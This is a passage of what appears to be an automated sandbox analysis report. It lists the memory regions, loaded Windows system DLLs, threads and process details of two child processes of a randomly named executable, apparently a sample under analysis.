(normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3680 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3681 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3682 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3683 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3684 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3685 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3686 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3687 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3688 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3689 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3690 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3691 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3692 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3693 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3694 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3695 start_va = 0x8f0000 end_va = 0xa77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 3696 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 91 os_tid = 0x1390 Thread: id = 98 os_tid = 0x6ec Process: id = "17" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x1009a000" os_pid = "0x139c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3345 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3346 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3347 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3348 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3349 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3350 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3351 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3352 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3353 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3354 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3355 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3356 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3357 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3358 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3359 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3360 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3526 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3527 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3528 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3529 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3530 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3531 start_va = 0x4f0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3532 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3533 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3534 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3535 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3536 start_va = 0x4f0000 end_va = 0x5adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3537 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3538 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3539 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3704 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3705 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3706 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3707 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3708 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3709 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3710 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3711 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3712 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3713 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3714 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3715 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3716 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3717 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3718 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3719 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3720 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3721 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3722 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3779 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3780 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3781 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3782 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 3783 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 93 os_tid = 0x1368 Thread: id = 106 os_tid = 0x5ac Process: id = "18" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd99f000" os_pid = "0x12c0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3367 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3368 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3369 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3370 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3371 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3372 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3373 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3374 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3375 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3376 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3377 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3378 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3379 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3380 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3381 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3382 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 3540 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3541 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3542 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3543 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3544 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3545 start_va = 0x500000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3546 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3547 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3548 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3549 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3550 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3551 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3552 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3553 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3723 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3724 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3725 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3726 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3727 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 3728 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3729 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3730 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3731 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3732 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3733 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3734 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3735 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3736 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3737 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3738 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3739 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3740 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3741 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3742 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3784 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 3785 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") 